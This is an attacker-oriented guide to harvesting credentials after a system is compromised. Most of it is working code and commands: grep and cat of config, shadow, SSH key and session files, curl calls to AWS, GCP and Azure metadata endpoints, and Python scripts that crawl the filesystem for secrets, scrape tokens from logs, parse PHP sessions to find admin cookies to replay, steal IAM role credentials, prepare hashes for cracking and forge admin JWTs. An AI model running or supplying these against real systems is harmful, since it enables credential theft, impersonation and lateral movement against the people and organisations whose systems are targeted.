Credential harvesting in post-exploitation involves extracting usernames, passwords, tokens, API keys, session identifiers, and authentication artifacts from compromised systems, applications, or user environments. Once initial access is achieved—via SQLi, command execution, LFI→RCE, stolen sessions, or uploaded webshell—the attacker focuses on collecting every credential stored on the host or accessible through the application.
Harvested credentials enable lateral movement, privilege escalation, persistence, and deeper exploitation across infrastructure.
Credential harvesting targets:
- databases
- configuration files
- environment variables
- session stores
- log files
- browser storage
- cloud metadata endpoints
- SSH keys
- token-based authentication systems
Attackers treat credentials as the primary post-exploitation resource.
High-Value Credential Targets
Database Credentials
Applications store DB credentials in:
config.php
settings.py
.env
application.properties
database.yml
config.json
These files often contain plaintext username/password pairs.
Once obtained, attackers access:
- user tables
- password hashes
- financial records
- admin tokens
- internal data systems
API Keys
Targets include:
- AWS access keys
- GCP service accounts
- Stripe/PayPal keys
- Twilio/SMS API keys
- GitHub tokens
- internal microservice access keys
API keys lead directly to high-impact pivoting.
Session Tokens
Session files or cookies allow impersonation of users and admins.
Sources:
- Redis session stores
- JWTs in logs
- PHP session files in /var/lib/php/sessions
- Node.js session stores (MongoDB/Redis)
- browser cookies, if the attacker gains access to the user environment
SSH Keys
Found in:
/home/*/.ssh/id_rsa (or id_ed25519 / id_ecdsa for newer key types)
/root/.ssh/id_rsa
Once acquired, the attacker logs in to every server whose authorized_keys trusts that key, unless the key is passphrase-protected.
Cloud Metadata Credentials
If SSRF or shell access on a cloud instance is available:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
The metadata service returns temporary credentials for the IAM role attached to the instance. They are not root credentials, but they carry every permission that role has, which is frequently far more than the application needs. On AWS, IMDSv2 only answers after a session token has been obtained with a PUT request, which blocks most simple SSRF primitives.
Password Hashes
Attacker extracts:
- bcrypt hashes
- MD5/SHA1 weak hashes
- PBKDF2/SHA256
- NTLM hashes on Windows servers
Hash cracking yields plaintext passwords.
Configuration Secrets
Framework secrets, including:
- JWT secret keys
- Django SECRET_KEY
- Flask secret keys
- Rails secret tokens
- encryption keys
These allow forging tokens or decrypting stored data.
Practical Credential Harvesting Techniques
Below are direct post-exploitation methods that attackers use in real environments.
Harvesting from Configuration Files
After gaining RCE or shell, search for files that contain secrets.
Practical Commands
grep -RIin "password" /var/www/
grep -RIin "DB_" /var/www/
grep -RIin "secret" /var/www/
grep -RIin "api_key\|private_key\|secret_key" /var/www/
(-I skips binary files and -n prints the line number; a bare "key" matches far too much, so search for the specific variable names instead.)
Search common frameworks:
/var/www/html/config.php
/config/settings.py
/.env
/app/config.json
/app/src/config.js
Example .env file:
DB_USER=root
DB_PASS=pass123
SECRET_KEY=abc123xyz
JWT_SECRET=myjwtkey
One file commonly yields several credentials at once.
Harvesting from Databases
If DB credentials are obtained, connect:
mysql -u root -p
psql -U postgres
mongo mongodb://user:pass@host:27017
Extract user hashes:
SELECT username, password FROM users;
Extract OAuth tokens:
SELECT token FROM oauth_sessions;
Extract session data:
SELECT session_data FROM sessions;
Harvesting Password Hashes
If file-based:
/etc/shadow
If inside DB:
SELECT password FROM users;
If application uses custom hashing:
- extract salt
- extract algorithm (read the login code: what is concatenated, in which order, how many rounds)
- replicate in cracking tool
Use hashcracking with automated tools, selecting the mode that matches the format (e.g. -m 0 MD5, -m 100 SHA-1, -m 1000 NTLM, -m 3200 bcrypt, -m 10000 Django PBKDF2-SHA256):
hashcat -m <mode> hashes.txt wordlist.txt
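The steps above (identify the format, extract the salt, replicate the algorithm, then hand the right file to hashcat) as one added example, not code from the original page. The users table below is constructed and every hash in it is computed inside the script; the "salt$hex" layout for the custom scheme and the hashcat mode numbers are the assumptions it relies on:

```python
import base64
import hashlib
import hmac
import re

# hashcat mode numbers for the formats that turn up in application dumps.
HASHCAT_MODES = {
    "md5": 0, "sha1": 100, "ntlm": 1000, "sha256": 1400,
    "bcrypt": 3200, "django_pbkdf2_sha256": 10000,
    "sha256_salt_pass": 1420,      # sha256($salt.$pass); hashcat input is hash:salt
}


def identify(stored: str) -> str:
    """Classify a stored hash by its shape. A bare 32-hex value may be MD5 or
    NTLM: only the source (web app table vs. SAM/NTDS) tells them apart."""
    if stored.startswith(("$2a$", "$2b$", "$2y$")) and len(stored) == 60:
        return "bcrypt"
    if stored.startswith("pbkdf2_sha256$"):
        return "django_pbkdf2_sha256"
    if re.fullmatch(r"[0-9a-zA-Z]+\$[0-9a-f]{64}", stored):
        return "sha256_salt_pass"      # assumed custom layout: salt$hex
    if re.fullmatch(r"[0-9a-f]{64}", stored):
        return "sha256"
    if re.fullmatch(r"[0-9a-f]{40}", stored):
        return "sha1"
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "md5"                   # or NTLM, see docstring
    return "unknown"


def to_hashcat_lines(dump):
    """Group (username, stored) rows into one input list per hashcat mode.
    Lines are user:hash, so run hashcat with --username."""
    files = {}
    for user, stored in dump:
        kind = identify(stored)
        if kind == "unknown":
            continue
        if kind == "sha256_salt_pass":
            salt, digest = stored.split("$", 1)
            line = f"{digest}:{salt}"   # salted modes want hash:salt
        else:
            line = stored
        files.setdefault(HASHCAT_MODES[kind], []).append(f"{user}:{line}")
    return files


def crack_custom(stored: str, wordlist):
    """Replicate the custom scheme sha256(salt + password) in Python to confirm
    the format on a few candidates before spending GPU time in hashcat."""
    salt, digest = stored.split("$", 1)
    for word in wordlist:
        if hashlib.sha256((salt + word).encode()).hexdigest() == digest:
            return word
    return None


def verify_django(stored: str, candidate: str) -> bool:
    """Re-run Django's scheme: pbkdf2_sha256$<iterations>$<salt>$<base64 hash>."""
    _algo, iters, salt, b64 = stored.split("$", 3)
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt.encode(), int(iters))
    return hmac.compare_digest(base64.b64encode(dk).decode(), b64)


def _make_dump():
    """Constructed users table; nothing here comes from a real system."""
    custom = "n4cl$" + hashlib.sha256(b"n4cl" + b"letmein").hexdigest()
    # Django's real default iteration count is far higher; 10000 keeps this fast.
    dk = hashlib.pbkdf2_hmac("sha256", b"hunter2", b"xYz9", 10000)
    django = "pbkdf2_sha256$10000$xYz9$" + base64.b64encode(dk).decode()
    bcrypt_shaped = "$2b$12$" + "abcdefghijklmnopqrstuv" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
    return [
        ("alice", hashlib.md5(b"Summer2024").hexdigest()),   # legacy unsalted md5
        ("bob", bcrypt_shaped),                               # identification only
        ("carol", custom),
        ("dave", django),
    ]


USERS_DUMP = _make_dump()

if __name__ == "__main__":
    for mode, lines in to_hashcat_lines(USERS_DUMP).items():
        print(f"# hashcat -m {mode} --username hashes_{mode}.txt wordlist.txt")
        print("\n".join(lines))
    print("carol:", crack_custom(USERS_DUMP[2][1], ["password", "123456", "letmein"]))
```

The point of crack_custom and verify_django is not speed: a handful of candidates run in Python prove that the salt order and encoding were read correctly from the application code, so a long hashcat run does not fail silently on a format mistake.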
Harvesting from Server Process Memory
Reading /proc/<pid>/environ requires root or the same UID as the process, but it exposes secrets injected through systemd units, Docker -e flags and CI runners that never touch disk. The file is NUL-separated, so split it before reading:
tr '\0' '\n' < /proc/<pid>/environ
strings /proc/<pid>/cmdline
Environment variables often hold:
- database passwords
- AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY
- JWT secret keys
Example environment variable dump (AKIA is the prefix of a long-lived access key ID; the secret key itself has no prefix):
export DB_PASSWORD="secret123"
export AWS_ACCESS_KEY_ID="AKIA...."
export AWS_SECRET_ACCESS_KEY="...."
Harvesting from Environment Files
Linux:
cat /etc/environment
cat ~/.bashrc
cat ~/.profile
Docker (secrets that Swarm or Compose mounts into the container):
cat /run/secrets/*
Kubernetes (inside a pod the service account token is mounted as a file; through kubectl, secret values come back base64-encoded, so a plain listing shows names only):
cat /var/run/secrets/kubernetes.io/serviceaccount/token
kubectl get secrets -A -o yaml
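Decoding what kubectl returns, as an added example that is not part of the original page. The JSON below is constructed to look like the output of kubectl get secrets -A -o json, trimmed to the fields that matter; the secret names, namespace and values are invented. The same "auths" structure is what ~/.docker/config.json holds on a host, so registry_logins applies to that file too:

```python
import base64
import json
import os


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode()


# Constructed stand-in for `kubectl get secrets -A -o json`. Values in "data"
# are base64-encoded, not encrypted: anyone who can list them can read them.
KUBECTL_OUTPUT = json.dumps({
    "apiVersion": "v1", "kind": "List",
    "items": [
        {"metadata": {"name": "db-creds", "namespace": "shop"}, "type": "Opaque",
         "data": {"username": _b64(b"shop_app"), "password": _b64(b"S3cr3t!")}},
        {"metadata": {"name": "registry", "namespace": "shop"},
         "type": "kubernetes.io/dockerconfigjson",
         "data": {".dockerconfigjson": _b64(json.dumps({
             "auths": {"registry.example.com": {"auth": _b64(b"ci-user:token123")}}
         }).encode())}},
        {"metadata": {"name": "default-token-abcde", "namespace": "shop"},
         "type": "kubernetes.io/service-account-token",
         "data": {"token": _b64(b"eyJ.constructed.sa-token"),
                  "ca.crt": _b64(b"-----BEGIN CERTIFICATE-----\nconstructed\n")}},
    ],
})


def decode_secrets(kubectl_json: str) -> list:
    """Flatten every Secret in a kubectl JSON list into decoded key/value rows."""
    rows = []
    for item in json.loads(kubectl_json)["items"]:
        meta = item["metadata"]
        for key, b64 in (item.get("data") or {}).items():
            raw = base64.b64decode(b64)
            try:
                value = raw.decode()
            except UnicodeDecodeError:
                value = raw          # binary material such as DER-encoded keys
            rows.append({"namespace": meta["namespace"], "name": meta["name"],
                         "type": item.get("type"), "key": key, "value": value})
    return rows


def registry_logins(rows: list) -> list:
    """Expand dockerconfigjson secrets (same layout as ~/.docker/config.json)
    into (registry, user, password) triples; "auth" is base64(user:password)."""
    logins = []
    for row in rows:
        if row["key"] != ".dockerconfigjson":
            continue
        for registry, entry in json.loads(row["value"]).get("auths", {}).items():
            if "auth" in entry:
                user, _, password = base64.b64decode(entry["auth"]).decode().partition(":")
                logins.append((registry, user, password))
    return logins


def read_pod_token(path="/var/run/secrets/kubernetes.io/serviceaccount/token"):
    """Inside a pod the projected token is a plain file; None when not in a pod."""
    if not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read().strip()


if __name__ == "__main__":
    for row in decode_secrets(KUBECTL_OUTPUT):
        print(f"{row['namespace']}/{row['name']} [{row['type']}] {row['key']} = {row['value']!r}")
    print("registry logins:", registry_logins(decode_secrets(KUBECTL_OUTPUT)))
```

A service-account token decoded this way is a bearer token for the API server; whether it is worth anything depends on the RBAC bound to that account, which kubectl auth can-i --list reveals once the token is in use.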
Harvesting from Logs
Web and application logs frequently leak credentials.
Search common log locations:
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/apache2/access.log
/app/logs/*.log
Look for:
- Authorization headers
- JWT tokens
- API keys
- password reset tokens
- OAuth redirect leaks (authorization codes and tokens in query strings or Referer headers)
Example patterns as they appear in logs:
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
X-API-Key: sk_live_abc123
token=reset_8s9df8sd7f
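A scanner for exactly those patterns, run over a few constructed log lines, as an added example that is not code from the original page. The log lines imitate an nginx access log whose log_format records request headers, plus one application log line that echoed a reset link; the JWT in them is built in the script with a dummy signature, so no real token or secret is involved:

```python
import base64
import json
import re


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


# Constructed token: HS256 header, small payload, stand-in signature.
_SAMPLE_JWT = ".".join([
    _b64url(b'{"alg":"HS256","typ":"JWT"}'),
    _b64url(json.dumps({"sub": "42", "role": "user", "exp": 1700000000}).encode()),
    "c2ln",
])

# Constructed log lines (no real system); the reset token appears twice on purpose.
SAMPLE_LOG = f"""\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /api/me HTTP/1.1" 200 512 "Authorization: Bearer {_SAMPLE_JWT}"
10.0.0.6 - - [12/Mar/2024:10:01:03 +0000] "POST /v1/charge HTTP/1.1" 201 88 "X-API-Key: sk_live_abc123"
10.0.0.7 - - [12/Mar/2024:10:01:04 +0000] "GET /reset?token=reset_8s9df8sd7f HTTP/1.1" 200 1024 "-"
app[1234]: INFO sent password reset mail to bob@example.com link=https://app.example.com/reset?token=reset_8s9df8sd7f
10.0.0.8 - - [12/Mar/2024:10:01:05 +0000] "GET /health HTTP/1.1" 200 2 "-"
"""

PATTERNS = [
    ("bearer_token", re.compile(r"Authorization:\s*Bearer\s+([A-Za-z0-9\-_.=]+)", re.I)),
    ("api_key_header", re.compile(r"X-API-Key:\s*([A-Za-z0-9_\-]+)", re.I)),
    ("reset_token", re.compile(r"[?&]token=([A-Za-z0-9_\-]+)")),
    ("password_in_url", re.compile(r"[?&]password=([^&\s\"]+)", re.I)),
]


def decode_jwt_claims(token: str):
    """Read header and payload of a JWT without verifying it (the attacker has
    no key yet; the claims still say who the token belongs to and when it expires)."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(_b64url_decode(parts[0]))
        payload = json.loads(_b64url_decode(parts[1]))
    except (ValueError, UnicodeDecodeError):
        return None
    return {"header": header, "payload": payload}


def harvest_log(text: str) -> list:
    """Return each distinct credential artefact found, with the line it came from."""
    seen, findings = set(), []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            for match in rx.finditer(line):
                value = match.group(1)
                if (kind, value) in seen:
                    continue
                seen.add((kind, value))
                finding = {"kind": kind, "value": value, "line": lineno}
                claims = decode_jwt_claims(value)
                if claims is not None:
                    finding["jwt"] = claims
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for hit in harvest_log(SAMPLE_LOG):
        print(hit)
```

Running it against a real log is a matter of passing the file contents to harvest_log; on a busy server the dedup set is what keeps the output readable, since the same session token recurs on every request.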
Harvesting Cookie / Session Data
PHP (one file per session, named after the PHPSESSID cookie value, readable as the web server user or root):
/var/lib/php/sessions/sess_xxx
Node.js express sessions stored in:
- Redis
- MongoDB
- file-based stores, in a directory such as /tmp/sessions/
Django sessions (session_data is base64-encoded and signed with SECRET_KEY, not encrypted, so it decodes to the user id and whatever else the application stashed in the session):
SELECT session_data FROM django_session;
These contain user IDs, tokens, and full session states. Because the session key is the cookie value itself, a readable session store is a direct impersonation path.
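A reader for the PHP session files named above, as an added example rather than code from the original page. The session contents are constructed here; the parser covers the scalar types, NULL and arrays of PHP's serialize() format, which is what the default php session handler writes as key|value pairs. The path /var/lib/php/sessions is the page's, and the "role" key that privileged_sessions looks for is an assumption about the application:

```python
import glob
import os


class _PHPUnserializer:
    """Minimal reader for PHP's serialize() output: i, d, b, s, N and a.
    The text is latin-1 decoded so that PHP's byte lengths stay correct."""

    def __init__(self, text: str):
        self.s, self.i = text, 0

    def _until(self, ch: str) -> str:
        end = self.s.index(ch, self.i)
        out, self.i = self.s[self.i:end], end + 1
        return out

    def value(self):
        tag = self.s[self.i]
        self.i += 2                      # skip "X:" (or "N;")
        if tag == "N":
            return None
        if tag == "i":
            return int(self._until(";"))
        if tag == "d":
            return float(self._until(";"))
        if tag == "b":
            return self._until(";") == "1"
        if tag == "s":
            n = int(self._until(":"))    # byte length of the string
            raw = self.s[self.i + 1:self.i + 1 + n]
            self.i += n + 3              # skip "<raw>";
            return raw.encode("latin-1").decode("utf-8", "replace")
        if tag == "a":
            n = int(self._until(":"))
            self.i += 1                  # skip "{"
            items = {}
            for _ in range(n):
                key = self.value()
                items[key] = self.value()
            self.i += 1                  # skip "}"
            return items
        raise ValueError(f"unsupported PHP type tag {tag!r} at offset {self.i}")


def parse_php_session(raw: bytes) -> dict:
    """Decode one sess_* file: a sequence of name|<serialized value> entries."""
    parser = _PHPUnserializer(raw.decode("latin-1"))
    session = {}
    while parser.i < len(parser.s):
        name = parser._until("|")
        session[name] = parser.value()
    return session


def privileged_sessions(sessions: dict) -> list:
    """Names of sessions whose 'role' is admin: the cookie values worth replaying."""
    return sorted(name for name, raw in sessions.items()
                  if parse_php_session(raw).get("role") == "admin")


def load_session_dir(path="/var/lib/php/sessions") -> dict:
    """Read every sess_* file into memory (real use; needs the web server's UID)."""
    out = {}
    for file in glob.glob(os.path.join(path, "sess_*")):
        with open(file, "rb") as fh:
            out[os.path.basename(file)] = fh.read()
    return out


# Constructed session contents, including a UTF-8 name to exercise byte lengths.
SAMPLE_SESSION = (b'user_id|i:42;role|s:5:"admin";name|s:4:"Zo\xc3\xab";'
                  b'csrf|s:8:"deadbeef";cart|a:2:{i:0;s:5:"SKU-1";s:3:"qty";i:2;}'
                  b'logged_in|b:1;note|N;')
OTHER_SESSION = b'user_id|i:7;role|s:4:"user";logged_in|b:1;'

if __name__ == "__main__":
    print(parse_php_session(SAMPLE_SESSION))
    print("admin sessions:", privileged_sessions({"sess_abc": SAMPLE_SESSION,
                                                  "sess_def": OTHER_SESSION}))
```

Whatever privileged_sessions returns, minus the sess_ prefix, is a PHPSESSID value; setting it in a browser takes over that session without ever touching a password.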
Harvesting Web Server Config
Extract secrets from server configs:
Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/
Apache
/etc/apache2/sites-enabled/
Look for:
- backend service credentials
- proxy_pass internal endpoints
- auth_basic_user_file (nginx) / AuthUserFile (Apache) entries, which point at .htpasswd files of crackable hashes
Harvesting SSH Keys
Locate keys (RSA is not the only type; ed25519 and ecdsa keys use different file names):
find / -path "*/.ssh/id_*" -type f 2>/dev/null
Extract:
cat ~/.ssh/id_rsa
cat ~/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat ~/.ssh/known_hosts
authorized_keys lists the public keys allowed to log in here, useful for seeing which accounts are trusted; known_hosts lists the hosts this account has connected to, which are the pivot targets (unless HashKnownHosts is enabled). A passphrase-protected private key is not immediately usable but can be cracked offline (ssh2john, then john or hashcat).
Use key to pivot to other servers.
Harvesting Cloud Secrets
If shell or SSRF:
AWS (IMDSv1, a plain GET; list the roles, then request one by name):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
AWS (IMDSv2, required when the instance enforces it; a session token must first be obtained with a PUT, which most SSRF primitives cannot issue):
TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
GCP (the Metadata-Flavor header is mandatory; without it the endpoint refuses the request):
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Azure (Metadata header plus the api-version and resource parameters):
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
These responses contain temporary access keys or OAuth access tokens for the identity attached to the instance, scoped to whatever that identity is permitted to do.
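The AWS exchange carried out end to end (session token, role listing, role credentials, shell exports), as an added example that is not part of the original page. It talks to the real metadata endpoint by default; the FakeIMDS class is a constructed stand-in that answers the same paths so the flow can be exercised offline, and its role name, token and credential values are invented:

```python
import json
from urllib import error, request

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def http_fetch(method, url, headers=None, timeout=2):
    """Real transport via urllib. Returns (status, body); HTTP errors are not raised."""
    req = request.Request(url, method=method, headers=headers or {})
    try:
        with request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except error.HTTPError as exc:
        return exc.code, exc.read().decode()


def harvest_aws_role_credentials(fetch=http_fetch):
    """IMDSv2 first: PUT for a session token, then GET with it. If the PUT is
    refused the instance still allows v1 and the same GETs work without a token."""
    status, token = fetch("PUT", IMDS + "/latest/api/token",
                          {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    headers = {"X-aws-ec2-metadata-token": token} if status == 200 else {}
    status, roles = fetch("GET", IMDS + CREDS_PATH, headers)
    if status != 200 or not roles.strip():
        return None                      # no instance profile, or v2 enforced and no token
    role = roles.split()[0]
    status, body = fetch("GET", IMDS + CREDS_PATH + role, headers)
    if status != 200:
        return None
    creds = json.loads(body)
    if creds.get("Code") != "Success":
        return None
    return {
        "role": role,
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],   # temporary keys are useless without it
        "expires": creds["Expiration"],
    }


def as_env_exports(creds: dict) -> str:
    """Shell lines that make the aws CLI on the attacker's box use the stolen role."""
    return "\n".join(f'export {k}="{creds[k]}"' for k in
                     ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"))


class FakeIMDS:
    """Constructed metadata service for offline testing. With require_v2=True
    every GET without a valid session token is rejected, as IMDSv2-only does."""
    TOKEN = "constructed-imds-session-token"
    ROLE = "web-app-role"

    def __init__(self, require_v2=True):
        self.require_v2 = require_v2

    def __call__(self, method, url, headers=None, timeout=None):
        headers, path = headers or {}, url[len(IMDS):]
        if method == "PUT" and path == "/latest/api/token":
            if "X-aws-ec2-metadata-token-ttl-seconds" not in headers:
                return 400, ""
            return 200, self.TOKEN
        if self.require_v2 and headers.get("X-aws-ec2-metadata-token") != self.TOKEN:
            return 401, ""
        if path == CREDS_PATH:
            return 200, self.ROLE + "\n"
        if path == CREDS_PATH + self.ROLE:
            return 200, json.dumps({
                "Code": "Success", "AccessKeyId": "ASIACONSTRUCTED00001",
                "SecretAccessKey": "constructed-secret-key",
                "Token": "constructed-session-token",
                "Expiration": "2024-03-12T16:00:00Z"})
        return 404, ""


if __name__ == "__main__":
    creds = harvest_aws_role_credentials(FakeIMDS())
    print(creds)
    print(as_env_exports(creds))
```

The two FakeIMDS modes make the defensive point concrete: an SSRF that can only issue header-less GETs gets the credentials from a v1-enabled instance and a 401 from a v2-only one, which is why enforcing IMDSv2 is the usual fix for this class of pivot.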
Harvesting Browser Stored Credentials (if user environment compromised)
Chrome credential store (an SQLite file; the password_value column is encrypted with a key derived from the OS keyring, so the user's login session or keyring secret is needed to decrypt it):
~/.config/google-chrome/Default/Login Data
Firefox cookies (SQLite, readable as-is) and saved logins (logins.json, encrypted with the key held in key4.db alongside it):
~/.mozilla/firefox/*.default-release/cookies.sqlite
~/.mozilla/firefox/*.default-release/logins.json
These require post-exploitation access on user machines, not servers.
Harvesting Middleware or Microservice Credentials
Inspect:
- ~/.docker/config.json (registry logins: base64 of user:password under "auths")
- docker-compose files and the .env they interpolate
- Kubernetes ConfigMaps and Secrets
- service mesh config
- API gateway configs
Example docker-compose:
environment:
  - MONGO_USER=admin
  - MONGO_PASS=12345
Harvesting Tokens From HTTP Headers
Use MITM or server logs to intercept:
Authorization: Bearer <token>
Cookie: session=xyz
X-API-KEY: abc123
Automated Credential Harvesting Scripts
Basic automated crawler (walks the filesystem for text files mentioning a credential keyword; /proc, /sys and /dev are pruned because reading /dev/zero or /proc/kcore never returns):
import os

keywords = ["pass", "key", "secret", "token", "authorization"]
skip = {"/proc", "/sys", "/dev"}

for root, dirs, files in os.walk("/"):
    # prune pseudo-filesystems in place so os.walk never descends into them
    dirs[:] = [d for d in dirs if os.path.join(root, d) not in skip]
    for f in files:
        path = os.path.join(root, f)
        try:
            # regular files only, capped in size; undecodable bytes in
            # binaries are ignored instead of raising
            if os.path.islink(path) or not os.path.isfile(path) or os.path.getsize(path) > 1_000_000:
                continue
            with open(path, errors="ignore") as fh:
                c = fh.read().lower()
        except OSError:
            continue
        hits = [k for k in keywords if k in c]
        if hits:
            print("Found:", path, hits)
Automated session file extractor (readable only as the web server user or root):
import glob

for s in glob.glob("/var/lib/php/sessions/sess_*"):
    with open(s, errors="ignore") as fh:
        print(s, fh.read())
Chaining Credential Harvesting
Credential harvesting is rarely the last step; it unlocks new attack paths.
Examples:
- DB password → dump password hashes → crack → admin login
- JWT secret key → forge tokens → gain admin access
- SSH private key → login to internal servers → escalate
- cloud keys → access S3 → download configs → exploit entire infrastructure
- OAuth tokens → impersonate user → session takeover
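The "JWT secret key → forge tokens" chain, which the Configuration Secrets section above also describes, carried out as an added example that is not code from the original page. It uses only the standard library (the same HS256 construction PyJWT produces), the harvested secret is the constructed JWT_SECRET value from the .env example earlier on this page, and verify_hs256 stands in for the application's own check so the forged token can be shown to pass it:

```python
import base64
import hashlib
import hmac
import json
import time

# Assumed harvested from the application's .env (constructed value).
HARVESTED_SECRET = b"myjwtkey"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Compact JWS signed with HMAC-SHA256 over base64url(header).base64url(payload)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, secret: bytes, now=None):
    """What a correctly written application does: pin the algorithm, check the
    signature in constant time, then the expiry. Returns the claims or None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None                      # refuses alg=none and RS256 confusion
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    claims = json.loads(_b64url_decode(body_b64))
    now = time.time() if now is None else now
    if "exp" in claims and claims["exp"] < now:
        return None
    return claims


def forge_admin_token(secret: bytes, user_id="1", lifetime=3600, now=None) -> str:
    """With the secret in hand the attacker is the issuer: any claims go through."""
    now = int(time.time()) if now is None else now
    return sign_hs256({"sub": user_id, "role": "admin", "iat": now, "exp": now + lifetime}, secret)


if __name__ == "__main__":
    token = forge_admin_token(HARVESTED_SECRET)
    print(token)
    print(verify_hs256(token, HARVESTED_SECRET))
```

Note what the verifier does not help with: every check in verify_hs256 passes, because the forged token is genuine in every respect except who minted it. The only remediation is rotating the secret, which invalidates every outstanding token, legitimate or not.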
Credential harvesting is the most important post-exploitation skill because it leads to persistent, reliable access.
Intel Dump
- Credential harvesting targets DB credentials, API keys, SSH keys, JWT secrets, cookies, tokens, and cloud metadata.
- Extract secrets from config files, logs, environment variables, session stores, browser storage, and process memory.
- Use grep, find, and automated scripts to locate credentials rapidly.
- DB access enables extracting hashes, tokens, and sensitive data.
- Log files frequently leak Authorization tokens, API keys, reset tokens, and cookies.
- SSH keys, cloud metadata, and JWT secrets provide strong pivoting paths.
- Harvested credentials enable lateral movement, privilege escalation, and long-term persistence across systems.